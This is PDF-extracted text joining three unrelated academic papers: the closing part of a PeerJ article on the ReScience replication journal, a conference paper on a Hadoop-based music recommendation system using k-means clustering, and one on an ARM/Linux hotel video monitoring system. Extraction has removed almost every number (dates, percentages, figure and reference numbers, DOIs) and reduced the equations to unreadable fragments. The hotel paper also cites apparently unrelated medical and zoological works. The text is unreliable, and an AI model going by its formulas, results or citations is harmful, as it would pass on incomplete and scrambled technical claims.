https://www.softwareheritage.org/ http://dx.doi.org/ . /peerj-cs. ✓ original work article replication (success) authors a authors a authors b replication (sucess) certified article authors b authors a+b ✓ ✓ a. rescience b. coscience replication (failure) authors b ✗ original work replication (failure) no publication authors a authors b ✗ feedback to author & editor feedback to author & editor figure (a) the rescience publication chain starts from an original research article by authors a, pub- lished in a journal, in conference proceedings, or as a preprint. this article constitutes the base material for authors b, who attempt to replicate the work based on its description. success or failure to replicate is not a criterion for acceptance or rejection, even though failure to replicate (continued on next page...) full-size doi: . /peerjcs. /fig- rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure (...continued) requires more precaution to ensure this is not a misunderstanding or a bug in the new code. after review, the replication is published, and feedback is given to original authors (and editors) to inform them the work has been replicated (or not). (b) the coscience proposal would require the replication to happen before the actual publication. in case of failure, nothing will be published. in case of success, the publica- tion will be endorsed by authors a and authors b with identified roles and will be certified as reproducible because it has been replicated by an independent group. reuse of scientific information, for better reproducibility of computations, and for fairer attribution of credit to scientists who contribute to research infrastructure. one immediate and legitimate question is to wonder to what extent a replication could be performed rior to the publication of the original article. this would strongly reinforce a claim because a successful and independent replication would be available right from the start. as illustrated in fig. , this would require group a to contact group b and send them a draft of their original work (the one that would be normally submitted to a journal) such that group b could perform a replication and confirm or refute the results. in case of confirmation, a certified article could be later published with both groups as authors (each group being identified according to their respective roles). however, if the replication fails and the original work cannot be fixed, this would prevent publication. this model would improve the quality of computational research and also considerably slow down the rapid pace of publication we are observing today. unfortunately, such a scenario seems highly improbable today. the pressure to publish is so strong and the incentive for doing replication so low that it would most probably prevent such collaborative work. however, we hope that the current replication crisis will lead to a change in attitude, with an emphasis on the quality rather than the quantity of scientific ouput, with coscience becoming the gold-standard approach to quality assurance. additional information and declarations funding the authors received no funding for this work. competing interests federico vaggi is an employee of amazon, inc., roman yurchak is an employee of symerio, and c. titus brown and nicolas p. rougier are academic editors for peerj. author contributions • nicolas p. rougier wrote the paper, prepared figures and/or tables, reviewed drafts of the paper, co-founder, editor, author. • konrad hinsen wrote the paper, reviewed drafts of the paper, co-founder, editor. • frédéric alexandre, alexandra k. diem, rafael n. henriques, owen petchey, frank stollmeier and guillaume viejo reviewed drafts of the paper, author. • thomas arildsen, pierre de buyl and olivia guest wrote the paper, reviewed drafts of the paper, editor. rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • lorena a. barba, c. titus brown, timothée poisot, karthik ram and tiziano zito reviewed drafts of the paper, editor. • fabien c.y. benureau, ozan caglayan, andrew p. davison, marc-andré delsuc and etienne roesch wrote the paper, reviewed drafts of the paper, reviewer. • georgios detorakis, mehdi khamassi, aaron shifman and julien vitay reviewed drafts of the paper, reviewer, author. • damien drix, pierre enel, matt g. hall, xavier hinaut, kamil s. jaron, almar klein, tiina manninen, pietro marchesi, daniel mcglinn, hans ekkehard plesser, yoav ram, cyrille rossant, marcel stimberg, federico vaggi, anya e. vostinar and roman yurchak reviewed drafts of the paper, reviewer. • benoît girard wrote the paper, reviewed drafts of the paper, editor, reviewer, author. • christoph metzner wrote the paper, reviewed drafts of the paper, reviewer, author. • vahid rostami and joseph stachelek wrote the paper, reviewed drafts of the paper, author. data availability the following information was supplied regarding data availability: rescience journal: https://zenodo.org/communities/rescience/. references anaconda inc. . conda. available at https://conda.io/ . baker m. . , scientists lift the lid on reproducibility. nature ( ): – doi . / a. colberg c, proebsting ta. . repeatability in computer systems research. communi- cations of the acm ( ): – doi . / . coudert f-x. . reproducible research in computational chemistry of materials. chemistry of materials ( ): – doi . /acs.chemmater. b . courtès l, wurmus r. . reproducible and user-controlled software environments in hpc with guix. in: hunold s, costan a, giménez d, iosup a, ricci l, requena meg, scarano v, varbanescu al, scott sl, lankes s, weidendorfer j, alexander m, eds. euro-par : parallel processing workshops. lecture notes in computer science, vol. . cham: springer. crook sm, davison ap, plesser he. . years of computational neuroscience. in: bower mj, ed. chap. learning from the past: approaches for reproducibility in computational neuroscience. new york: springer new york, – . davison ap. . automated capture of experiment context for easier reproducibility in computational research. computing in science and engineering : – doi . /mcse. . . docker inc. . docker. available at https://www.docker.com/ . donoho dl, maleki a, rahman iu, shahram m, stodden v. . reproducible research in computational harmonic analysis. computing in science engineering ( ): – doi . /mcse. . . rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://zenodo.org/communities/rescience/ https://conda.io/ http://dx.doi.org/ . / a http://dx.doi.org/ . / http://dx.doi.org/ . /acs.chemmater. b http://dx.doi.org/ . /mcse. . https://www.docker.com/ http://dx.doi.org/ . /mcse. . http://dx.doi.org/ . /peerj-cs. guo pj, engler d. . cde: using system call interposition to automatically create portable software packages. in: proceedings of the usenix annual technical conference, usenix’ . portland: usenix association. available at http://dl.acm. org/citation.cfm?id= . . halchenko yo, hanke m. . four aspects to make science open ‘‘by design’’ and not as an after-thought. gigascience ( ) doi . /s - - - . hinsen k. . writing software specifications. computing in science & engineering ( ): – doi . /mcse. . . ioannidis jpa. . why most published research findings are false. plos medicine ( ):e doi . /journal.pmed. . iqbal sa, wallach jd, khoury mj, schully sd, ioannidis jpa. . reproducible research practices and transparency across the biomedical literature. plos biology ( ):e doi . /journal.pbio. . janz n. . bringing the gold standard into the class room: replication in university teaching. international studies perspectives epub ahead of print mar doi . /insp. . kitzes j, turek d, deniz f (eds.) . the practice of reproducible research: case studies and lessons from the data-intensive sciences. oakland: university of california press. lindholm t, yellin f. . java virtual machine specification. second edition. boston: addison-wesley longman publishing co., inc. manninen t, havela r, linne m-l. . reproducibility and comparability of com- putational models for astrocyte calcium excitability. frontiers in neuroinformatics : doi . /fninf. . . mesnard o, barba la. . reproducible and replicable cfd: it’s harder than you think. ieee/aip computing in science and engineering ( ): – doi . /mcse. . . munafò mr, nosek ba, bishop dvm, button ks, chambers cd, du sert np, simon- sohn u, wagenmakers e-j, ware jj, ioannidis jpa. . a manifesto for repro- ducible science. nature human behaviour ( ): doi . /s - - . murta l, braganholo v, chirigati f, koop d, freire j. . noworkflow: capturing and analyzing provenance of scripts. in: provenance and annotation of data and processes. lecture notes in computer science, vol. . berlin: springer international publishing, – . open science collaboration. . estimating the reproducibility of psychological science. science ( ):aac –aac doi . /science.aac . perkel j. . democratic databases: science on github. nature ( ): – doi . / a. sandve gk, nekrutenko a, taylor j, hovig e. . ten simple rules for repro- ducible computational research. plos compututational biology ( ):e doi . /journal.pcbi. . smith am, niemeyer ke, katz ds, barba la, githinji g, gymrek m, huff kd, madan cr, cabunoc mayes a, moerman km, prins p, ram k, rokem a, teal tk, valls rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /mcse. . http://dx.doi.org/ . /journal.pmed. http://dx.doi.org/ . /journal.pbio. http://dx.doi.org/ . /insp. http://dx.doi.org/ . /fninf. . http://dx.doi.org/ . /mcse. . http://dx.doi.org/ . /s - - http://dx.doi.org/ . /science.aac http://dx.doi.org/ . / a http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /peerj-cs. guimera r, vanderplas jt. . journal of open source software (joss): design and first-year review. arxiv preprint. arxiv: . . stachelek j. . [re] least-cost modelling on irregular landscape graphs. rescience ( ) doi . /zenodo. . topalidou m, leblois a, boraud t, rougier np. . a long journey into repro- ducible computational neuroscience. frontiers in computational neuroscience : doi . /fncom. . . topalidou m, rougier np. . [re] interaction between cognitive and motor cortico- basal ganglia loops during decision making: a computational study. rescience ( ) doi . /zenodo. . viejo g, girard b, khamassi m. . [re] speed/accuracy trade-off between the habitual and the goal-directed process. rescience ( ) doi . /zenodo. . wilson g. . software carpentry: lessons learned. f research : doi . /f research. - .v . wilson g, aruliah da, brown ct, hong npc, davis m, guy rt, haddock shd, huff kd, mitchell im, plumbley md, waugh b, white ep, wilson p. . best practices for scientific computing. plos biology ( ):e doi . /journal.pbio. . rougier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ . http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /fncom. . http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /f research. - .v http://dx.doi.org/ . /journal.pbio. http://dx.doi.org/ . /peerj-cs. international conference on sensor network and computer engineering (icsnce ) design and implementation of music recommendation system based on hadoop zhao yufeng school of computer science and engineering xi'an university of technology shaanxi, xi’an, china e-mail: zyfzy @ .com li xinwei school of computer science and engineering xi'an university of technology shaanxi, xi’an, china e-mail: @qq.com abstract—in order to solve the problem of information overload of music system under large data background, this paper studies the design scheme of distributed music recommendation system based on hadoop. the proposed algorithm is based on the mapreduce distributed computing framework, which has high scalability and performance, and can be applied to the calculation and analysis of off-line data efficiently. the music recommendation system designed in this paper also includes client, server interface, database and etl operation, which can calculate a set of complete recommendation system from user operation end to server and data calculation. in order to improve the accuracy of the recommendation algorithm, this paper introduces k-means clustering algorithm to improve the recommendation algorithm based on user-based collaborative filtering.the experimental results show that the accuracy of the proposed algorithm has been significantly improved after the introduction of k-means. keywords-music recommendation; k-means clustering; collaborative filtering; recommendation algorithm; hadoop i. introduction with the development of the mobile internet, the amount of data generated by mobile app has increased rapidly in recent years. on july , , trustdata, a well-known mobile big data monitoring platform in china released the "analysis report of china mobile internet development in the first half of " [ ]. among them, mobile music as a high-frequency application, the number of the user be showed a steady growth in the first half of , peak dau (daily active users) nearly million. taking netease cloud music as an example, since its client app was launched in april ,the number of users has reached million, song orders million. such a huge amount of data makes the traditional single-server data storage and processing becomes more and more clumsy. moreover, it is more and more difficult for users to find their favorite songs in huge amounts of data. after all, favorite songs are only a few, and finding them one by one can be very difficult. the past practice is that when users want to listen to some songs, they search for them by engines, but only find songs they have known. a lot of songs that users do not know, but will probably like very much, will never be heard. if there is a system specifically for users to push songs, users will spend less time searching for songs, and the stickiness from users to the system will increase. based on this, this paper uses hadoop, a big data computing and storage framework, to store and calculate data, so as to solve the problem in finding songs, and also improve user's activity and stickiness. the hadoop-based recommendation system used in this paper has the following important implications in today's internet context: ) to effectively solve the problem of "information overload", to provide users with interesting content by exploring the relationship between users and songs; ) hadoop cluster parallel computing and distributed storage technology has good scalability, can effectively handle massive data storage and computing problems; ) for the enterprise, the system with the recommended function can enhance the user experience and increase the user's activity and stickiness. international conference on sensor network and computer engineering (icsnce ) ii. algorithm basis a. traditional user-based collaborative filtering recommendation algorithm the traditional user-based collaborative filtering recommendation algorithm is based on several users that are most similar to this user's interest, and then recommends songs that the user has not heard from these similar users. the specific method is to find each user by user similarity algorithm some of the most similar users, and then summarize the similar user listening records, from which the target user to find out the songs have not been heard, and then similar users to sort the similarity to obtain the preference of each song, the order of these songs, so as to target users recommend [ ]. specific algorithm steps are as follows: ) construct users - song data representation matrix. the row vector represents the user, and the column vector represents each song. the matrix value indicates whether the user has heard of the song, means that it has not been heard, and means it has been heard. it is a - matrix. ) generate the nearest neighbor set. according to the user-song matrix, the similarity algorithm is used to calculate the user's similarity so as to find the user set closest to the target user. formula ( )[ ] calculates the similarity of two users. |)v(n||)u(n| |))i(n| log( w )v(n)u(ni uv     () ) produce recommendations. the recommendation value of a song that a similar user has heard while the target user has not heard is determined by the similarity of the user with the target user. a user set must have many users that have heard the same song, and this song's recommended value is the sum of the similarities of these users. in this way, songs that have not been heard by the target user can be sorted according to the recommended values, and songs with high recommendation values will be preferentially pushed to the target user. equation( ) [ ] calculates the user's preference for song i.    )i(n)k,u(sv viuv rw)i,u(p   b. introducing the k-means algorithm to optimize the traditional recommendation algorithm clustering is an unsupervised learning method which aggregates data with similar attributes on the basis of nomanual labeling. it combines data for similarities and the data in the same group have similarities. the data in the different group is different from each other. the improved collaborative filtering recommendation algorithm in this paper is based on the user base with high similarity, so that the algorithm has a better recommendation effect. similar calculation directly restricts the effectiveness of the clustering effect and thus affects the final recommendation result. the principle of the algorithm is as follows: suppose there is a group of users user, the total number of users is m, remember to be u (u , u , u , ..., um), each user ux has n attributes, recorded as cx (cx , cx , cx ,..., cxn), the principle of clustering is to compare each attribute on the basis of the set u and divide into the groups of similar users [ ]. the core idea of the k-means algorithm is to divide a given group of users into k groups. within each k group, a cluster center is set to calculate the distance of each data from the center. the minimum distance is attributed to this group. c. k-means clustering algorithm improvement ) the removal of free points [ ]. of all the data points, the free points are those that are far away from all other points, and their existence will cause the deviation of the center point in the belonging class and thus the classification effect. the process of removing free points in this paper is as follows: let the total number of users be m, the total number of paths of all users to other users be calculated according to the formula ( ): ) (   mm l  then the sum of all users is:     m i ij ji ccgapd ),(  )()()(),( jninjijiji ccccccccgap   international conference on sensor network and computer engineering (icsnce ) in formula ( ), ci , cj , ...cin, cjn are n attributes of users ci and cj. find the distance average from l and d, formula ( ) d l emv   formula ( ) is the average of all user distances. for each user u, compute the distance u from all other users lu = (ui, uj). if all lu> = emv, the user is classified as a free point, a separate category. if the number of free points is small, they can’t be classified into a category for collaborative filtering, so you can classify it to a class that is closest to a type of center point. ) the selection of random points will also have an impact on the classification results, and fall into the local optimal solution. in order to solve this problem, the method adopted in this paper is to adopt the improved algorithm of clustering: dichotomous clustering [ ]. the idea of dichotomous clustering is to first classify all the points as a cluster and then divide it into two (k = k-means clustering), and then select the class that can minimize the clustering cost function again and divide it into two formula until the number of clusters equals k. the cluster cost function is defined as the sum of squared error of the cluster, as shown in formula ( ). the largest square error sum of a class, this kind of point in the distance from the center of the maximum distance, you need to be divided once again.    icp i cpei  iii. recommended system design this section describes the implementation and testing of the entire system and what frameworks are included in each of the system's features. first of all, introduce the top-level design; then analyze the overall framework of the system, what technologies are needed, and the overall process of the system; finally, we evaluate the recommended results from the accuracy and recall rate of recommendations. a. recommended process the k-means clustering-based collaborative filtering recommendation algorithm proposed in the previous section is mainly divided into two steps, one is to use k-means to implement user clustering, and the other is to perform a recommendation algorithm based on user collaborative filtering thus generating the recommended result. user song recording data songs commonly used labels user clustering collaborative filtering generate recommended results user similarity figure . distributed recommended algorithm flow algorithm parallelization of the flow chart is shown in figure . clustering algorithm is divided into three steps. the first step is to create a user tag model: user log table and song list of commonly used tags through a step mapreduce process to generate user-tag model, the tag file as a cache file for each user's song recording tag statistics in the tag vector increase the number of each position to generate a user label matrix. the second step is to use k-means algorithm to calculate the cluster center point of user label matrix. after several iterations, the relatively stable center point of each cluster is determined. the third step reads the central point file as a cache, in order to classify users, by calculating the user from which one of the nearest center, put this user into which cluster. the user-based collaborative filtering algorithm will recommend collaborative filtering for users in each cluster.this step is divided into a number of steps, including counting the number of a song being listened to, counting the number of a user listening to music, calculating user similarity, generating recommended results. b. recommended system architecture design the recommended system is divided into the recommended algorithm layer, server-side and client. the recommended algorithm layer uses hadoop cluster for distributed recommendation, the server side uses the java servlet and mysql database for development, and the client side uses android for display[ ]. log collection is international conference on sensor network and computer engineering (icsnce ) collected using the etl tool sqoop. system overall framework is shown in figure . it can be seen from the figure that the recommended system is divided into major parts: top-level client, server, database and hadoop layer. the client uses the android system for display. server development uses java ee development. database uses mysql. mysql is the intermediate data link between the client and the recommendation system. data is stored in the database so that front-end servers and hadoop are decoupled. the transfer of data between the database and hadoop takes the sqoop. sqoop is a distributed log collection system based on hadoop, which requires hadoop to run, which can also speed up data transfer. the collected data is stored in hdfs. the hadoop layer is divided into two parts, one is hdfs data storage, and the other is mapreduce distributed computing. mapreduce reads the data from hdfs and calculates it, and then saves the results back to hdfs. sqoop reads data from the hdfs and transfers to mysql, the client requests the server at irregular intervals, the server reads data from the database and returns it to the client, and the user's operation of songs is fed back to the server and saved to the database[ ]. hadoop android webservice mysql hdfs mapreduce sqoop figure . recommended system architecture c. recommended system function module analysis when users use the recommendation system, the system recommends different songs to different users, which requires users to log in the system with different user names. in order to log in, the system also has to provide the user registration function. to listen to different songs, users must also be able to search for songs and add tags to the songs. because we have no songs to play, we also need a collection or a favorite feature for users[ ]. the server side designs the corresponding interfaces based on these requirements, and the database also designs different tables to store the content. accordingly, we have designed the function diagram of the system, as shown in figure . as can be seen from the figure, the system function is decomposed into four modules. clients have user registration, login, search songs, tag songs and play features. play actually refers to favorites or likes. because the song involves copyright issues, it can only be replaced by favorites or likes. these functions correspond to the server-side interface to provide data. data is read from the database, so the database is designed with three tables: the user table, used to register and log in; the table for recording users' listening to songs, with the largest amount of data; song table storage song's basic information, including tag information, search songs and add tags[ ]. mysql client register login search add tag play service registration interface login interface search interface add interface user tablerecord list of listening to songs song list hadoop collaborative filtering k-means clustering sqoop figure . recommended system function block diagram iv. design of hadoopbased recommendation system algorithm parallelization is based on the k-means clustering algorithm introduced in the previous chapter and user-based collaborative filtering recommendation algorithm is implemented in the distributed system, the distributed international conference on sensor network and computer engineering (icsnce ) recommendation algorithm is divided into two modules, one is distributed k-means clustering algorithm, one is the distributed collaborative filtering recommendation algorithm, and finally the two algorithms connected to achieve the work of the entire distributed recommendation algorithm[ ]. a. k-means clustering of parallel design the data input of the k-means algorithm is a matrix, because here the user is clustered, so the user-label matrix is first formed by data preprocessing. user listening records are large files and need to be designed in parallel. listener recorded data into the hdfs behind the addition of each song's label, the formation of (user id, song id, song time, label) this format records. then use mapreduce to parallelize the user-label matrices in one step. then the user-label matrix is clustered. the clustering and parallelization algorithm is designed as follows: the first step scans all the original points and randomly selects k points as the center point of the first step cluster. the second step is to calculate the cluster of all the points to each center point, and to point each point to the closest center point cluster. the third step to repeat the second step to meet the termination conditions[ ]. the fourth step is to calculate all the user points, the user assigned to their respective clusters. algorithm architecture is shown in figure . mapreduce数据源 hdfs userlog.txt songtags.txt user record mapping song label mapping utmatrixmapper utmatrixreduce user label matrix kmeansmapper kmeansreducer kmeansdriver cluster center user clustering kmeansclustermapper kmeanscombiner figure . distributed k-means clustering algorithm architecture b. concurrent design of user-based collaborative filtering recommendation algorithm according to the formula ( ) and ( ) in the first section, combined with the rules of hadoop distributed design, the following steps are designed for the recommendation algorithm: the first step is to count how many songs each user listens to; the second step is to count the number of times each song is heard; the third step is to calculate the similarity of every two users, but only the similarity of the two users who have heard the same song need to be computed; the fourth step, is to calculate each user's recommending value for each song to form a recommend list; the final step is to sum up the recommending values for a user listening to the same song. the above steps are implemented based on mapreduce, and the entire work flow requires a number of map and reduce to complete. figure shows the mapreduce architecture based on the user collaborative filtering algorithm. userlistencountmapper userlistencountreduce songlistenedcountmapper songlistenedcountreduce usersimilaritymapper usersimilarityreduce usercommendsimmapper usercommendlogmapper usercommendreducer mapreduce userlog.txt mapping user listening records user songs recorded and the number the number of songs to be heard user similarity file 源数据 user song interest value hdfs generate recommended results usersongvaluemapper usersongvaluereducer figure . distributed architecture based on user collaborative filtering algorithm v. experiments and evaluation in the same situation as the data-set, many times of repeated experiments were done on the traditional user-based collaborative filtering algorithm, the recommendation algorithm after introducing k-means clustering and the recommendation algorithm after the improved clustering. and the stable results were selected to analyze [ ]. a. experimental environment and data set international conference on sensor network and computer engineering (icsnce ) environment construction and configuration include hadoop cluster, sqoop, development environment and web server. the cluster environment is built using vmware virtual machines. the cluster is built using three nodes, one master and two slaves.  host configuration hardware environment: cpu intel i - , quad-core, . ghz, ram gb;  software environment: os centos , java environment jdk . , server tomcat . , hadoop . . ;  development environment: eclipse, windows , hadoop.plugin;  music data used in this experiment are from the network, including more than , users, more than , , user operations, and tags. b. results show figure shows a screenshot of the recommended results for the android phone. figure . android mobile music recommended results c. evaluation indices the precision and recall [ ] are used as evaluation indices.each user's song date is sorted in descending order, with the top % as the training set, and the remaining % as the test set for experimental evaluation. % results drecommende ofnumber the results drecommende ofnumber correct the precision   % like users ofnumber the results drecommende ofnumber correct the recall  () formula ( ) and formula ( ) are calculated formulas for the precision and recall respectively. d. the line contrast chart of three algorithms after repeated experiments that the precision of three algorithms changes with the k-value is shown in line chart as figure : as shown in figure , the precision after introducing the k-means clustering algorithm is better than the traditional collaborative filtering algorithm, and when the k value is , the precision is increased by about . %, which is the best classification. after the clustering algorithm is improved, the precision is nearly . % higher than unimproved when the k value is . figure is the recall change chart for three algorithms. the recall of k-means clustering algorithm is better than that of the traditional collaborative filtering algorithm, and when the k value is , the recall can increase about . %. when the k value is , the recall increases nearly . % after the clustering algorithm is improved; but as the k value increases, the improved clustering is lower than the unimproved clustering algorithm. because the user number is fixed, after removing the free point, each classification will be affected. some classification number is very few, then the recommended result is inaccurate, thus the whole effect of the recommendation algorithm is affected. figure . the change of precision with k value international conference on sensor network and computer engineering (icsnce ) figure . the change chart of recall with k value vi. concluding remarks this paper puts forward the design and implementation of the hadoop-based music recommendation system, and improves the traditional user-based collaborative filtering recommendation algorithm, and improves the precision of the recommendation algorithm by using the song tag for users clustering. hadoop, a scalable and high-performance distributed computing platform, provides a reference for the design of a music recommendation system in the background of large data. the recommendation algorithm of k-means clustering and collaborative filtering is designed based on mapreduce distributed framework, which has some reference significance for the distributed design of the recommendation algorithm. references [ ] trustdata. china mobile internet development analysis report for the first half of [eb/ol]. ( - - ). http://itrustdata.com/#service [ ] xiang liang recommended system practice[m].beijing:people post press, . : - zhang xin-sheng zhang hai-ying mao qian.hadoop[eb/ol].( - - ).https://baike.baidu.com/item/ha doop/ [ ] wu hongchen, wangxinjun,chengyong,pengzhaohui. advanced recommendation base on collaborative filtering and partition clustering[j].computer research and development, , (s ): - . [ ] zhengjie.machine learning algorithm principles and programming practice[m].beijing.electronic industry press, . : [ ] weston j, bengio s, hamel p, et al. large-scale music annotation and retrieval: learning to rank in joint semantic spaces.[j]. arxiv: learning, . [ ] den oord a v, dieleman s, schrauwen b, et al. deep content-based music recommendation[c]. neural information processing systems, : - . [ ] su j, chang w, tseng v s, et al. personalized music recommendation by mining social media tags[j]. procedia computer science, : - . [ ] avidson j, liebald b, liu j, et al. the youtube video recommendation system[c].conference on recommender systems, : - . [ ] feng ya-li,jiangjie,tianfeng.research on the combined recommendation algorithm based on item and user[j].information technology, ,( ): - . [ ] chang xiao yu,yu zheng sheng.point-of-interest recommendation algorithm introducing time attenuation item[j].journal of hangzhou dianzi university(natural sciences), , ( ): - . [ - - ]. doi : . /j.cnki.hdu. . . [ ] zhao z, shang m. user-based collaborative-filtering recommendation algorithms on hadoop[c]. knowledge discovery and data mining, : - . [ ] chen yaxi.music recommendation system and related technologies [j]. computer engineering and applications, , ( ): - + . paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) design of the hotel monitoring system for the image and video collection wang pengfei school of leisure management xi’an eurasia university xi’an, china e-mail: wangpf @ .com abstract—with the more attention of the security of the hotels, an effective hotel monitoring system was required. based on the samsung s c , the proposed system uses the linux system to accomplish the intelligent video surveillance. using the image acquisition process and the embedded boa server, designed an intelligent video image acquisition system. the system capturing image by the usb camera and building an embedded web server, which complete the image acquisition, image processing, and the image transmission function. it can see the acquire result on to the lan at the pc via the webpage. it could complete the function of image acquisition, image processing, image transmission, the realization of ultimate in local area net pc through a web view the result. keywords-video sensor; linux; usb camera; v l ; web server i. introduction there are many products in the market for hotel monitoring, but these products are often expensive and cannot be widely applied to all kinds of hotels. based on the above, this system using linux operation system based on the arm processor to construct the monitoring system, which can be widely used in the hotel lobby, stairs and building dead ends, so as to ensure the real-time monitoring of the hotel in all directions [ ]. ii. the structure of the systemype this system is based on the linux embedded system, mainly composed of the software and the hardware [ ]. it includes the image and video collection, the display module, the data processing and the transmission module. the network transmission environment is lan. the structure of the system is shown in figure . data process module video display module local network d a ta tra n s m is s io n m o d u le image acquisition module figure . overall structure diagram of the system the image acquisition module collects the image data through the usb camera [ ]. the data processing module mainly deals with the user commands and the operation of the generated data. data transmission module is currently popular browser /web server mode, through the embedded web server communicates the client pc browser between the http data format. the image display module is the pc port under the lan, which sends data requests to the web server through the browser web pages [ ]. iii. the monitoring system structurestructure according to the functional requirements of this system, the following hardware devices are needed. the specific hardware structure is showed in figure . arm s c (linux) pc (win ) usb camera dm net rs sdram/flash wireless net router web video display wiretcp/ip tcp/ip wireless serial debug html cgi serial debug figure . the system hardware structure in figure , arm s c is the main chip of the system. the image data was collected by the usb camera; the collected images stored in sdram for transferred facilitate [ ]. the video data stored in flash. by the dm card, the network module could communicate with the development board. at the same time, in order to realize the serial communication interface rs combined the monitoring system and pc. the wireless network connects the wireless lan and the development board for the wireless communication. international conference on sensor network and computer engineering (icsnce ) iv. design and implementation of image acquisition module a. design of software system based on the linux operation system, the image acquisition program, the web server boa and the cgi/html were combined together [ ]. the software structure is shown in figure . image acquisition program web server boa image display program cgi web display program html linux operation system figure . the system software structure the operating system uses the management processors, the memory, the devices and the user interfaces. the linux operation system could be reduced for the requirement function [ ]. the application program could visit the device by the related api and then controls the hardware through the driver. b. design and implementation of the image acquisition module v l (video linux) is the driven structure of the video device in the linux kernel. it provides a unified function interface for the upper-layer applications accessing to the underlying video devices. v l could support the multiple hardware devices and the running framework of v l in linux is shown in figure . device/video x v l device number ( , x) character device driver core v l driver core (v l -dev.c) v l driver (struct video_device) camera driver camera system core application hardware figure . the structure of v l from figure , the frame structure mainly includes four parts. it is showed in table . table . the frame structure of v l name function character device driver core v l is the character device that has all the features of a character device to provide an interface to the user. v l driver core build a standard video device driver framework in the kernel and provide a uniform interface function for video operations. v l driver device according to the platform characteristics, implements the v l driver, including registration the video device. camera device driver power, working clock, video image cutting and the io interface. implement various device control methods for upper level calls and registration v l _subdev. c. video image acquisition programs after the embedded processor gets the image information, the jpeg compress program is executed and the image acquisition is completed. finally, the video coding is carried out by the mpeg- video coding standard. the process of video image acquisition is shown in figure . start open the device document acquire the driver device memory mapping single frame collection in video data end of collection condense the video end y n figure . the image collection flow chart first, the system creates a file to save the collected image information. next, open the usb camera's device. with opening the device file, gets the driver information of the device. after the image formatting is completed, the image buffer will be applied [ ]. then establish the mapping of the kernel space image buffer to the user space. finally, using the camera to capture the image data, the collected data will be saved to the driver's buffer [ ]. international conference on sensor network and computer engineering (icsnce ) d. design and implementation of image transmission after the video image file collection is well done, the web server should be established. through the network protocol, the client can browse the website and download the files. that is the mainstream browser/server mode [ ]. with the characteristics of embedded linux system and the requirement of the development board hardware resources (dm ), the communication between the web server and the client using the tcp/ip protocol. by the cgi program, realizes the video data transmission. the transferred diagram among the development board, server and the client is shown in figure : video image document web server router tcp ip client client tcp/ip figure . the net transmission based on the tcp/ip protocol dm net chip sets the ip address and the physical address of the development board. when the development board works in the normal linux system, connects the rj interface to the router through the cable, the wired/wireless devices in the same local area net can achieve the network communication. v. test result of the image transmission a. design of cgi andhtml netpage the system could browse and download the video files on the web page which collected by the development board [ ]. so the server needs to respond to the request from the client web page and access the files in the server through the cgi common gateway interface program. the cgi program's model in the server is shown in the figure . client web browse boa server common netgate interface cgi program collect image file http (html) w e b s e rv e r p la tfo rm figure . the flow chart of the cgi the cgi program is running on the server and the client sends a cgi request through the html pages to the server. the server receives will be executed after the specified cgi application, then the cgi application sends the result to the client web browser. this result is formatted into html format and displayed by the browser. b. the test results in this paper, using our school hotel as an example to implement and test the function of the above system. the system ensures the overall stability and smooth operation of the system, and completes the image video acquisition and the client's web page display [ ]. the monitoring result is showed in figure . international conference on sensor network and computer engineering (icsnce ) figure . the test result of the proposed monitoring system vi. conclusions the all-around monitoring of the hotel has become a basic condition for safety. video surveillance is not only small, stable and safety, but also does not appear the "dead angle" phenomenon than the artificial monitoring. based on the characteristic, the proposed video acquisition and transmission system has a very good market prospect. acknowledgment this work was partly supported by shaanxi province social science fund project (no. r ) of china and the scientific research fund project of shaanxi provincial department of education ( jk ). references [ ] d.zhang, j.han, and l.jiang, et al. “revealing event saliency in unconstrained video collection”, ieee transactions on image processing, vol. , jan. , pp. - , doi: . /tip. . . [ ] w h.gross, video circuits collection, analog circuit design, rd ed, vol. . elsevier inc: , pp. - . [ ] d.hai, t.hua, “a video processing system for automated traffic data collection of gap size for roundabouts”, proc. ieee symp. electrical and computer engineering, ieee press, jun. , pp. - , doi: . /ccece. . . [ ] x.zhang, x.li, and l. k. “remote video monitoring system based on arm and linux”, microcomputer & its aapplications, vol. , jul. , pp. - , doi: . /icicip. . [ ] e.aytac, h.erem, and h.remzi f, et al. “a novel data collection and monitoring system for health status measures in patients undergoing lateral internal sphincterotomy: the knowledge program (tkp)”, asian journal of surgery, vol. , may. , pp. - , doi: . /j.asjsur. . . . [ ] a.bhuiyan m z, j.wu, and g.wang, et al. “quality-guaranteed event-sensitive data collection and monitoring in vibration sensor networks”, ieee transactions on industrial informatics, vol. , feb. , pp. - , doi: . /tii. . . [ ] y.l.hwang, y.e. shin. “unrestrained electrocardiograph based on textile electrode and smartphone application for assessment of bicycle exercise”, journal of biomedical engineering research, vol. , may. , pp. - , doi: . /jber. . . . . [ ] c.habib, a. makhoul, and darazi r. “self-adaptive data collection and fusion for health monitoring based on body sensor networks”, ieee transactions on industrial informatics, vol. , jun. , pp. - , doi: . /tii. . . [ ] h.liang. “application function and daily management decision of hotel data center”, talanta, vol. , apr. , pp. - , doi: . /icmii- . . . [ ] a.gunawan, h. c.lau, and p.vansteenwegen. “orienteering problem: a survey of recent variants, solution approaches and applications”, european journal of operational research, vol. , feb. , pp. - , doi:org/ . /j.ejor. . . . [ ] g.donatelli, r.chiche, and cereatti f, et al. “endoscopic drainage of intra-abdominal collection after bariatric surgery”, obesity surgery, vol. , jun. , pp. - , doi: . /s - - - . [ ] f. e.clark, s. l.davies , and madigan a w, et al. “cognitive enrichment for bottlenose dolphins (tursiops truncatus): evaluation of a novel underwater maze device”, zoo biology, vol. , jun. , pp. - , doi: . /zoo. . https://doi.org/ . /tip. . https://doi.org/ . /ccece. . https://doi.org/ . /icicip. . https://doi.org/ . /j.asjsur. . . https://doi.org/ . /tii. . https://doi.org/ . /tii. . http://dx.doi.org/ . /icmii- . . 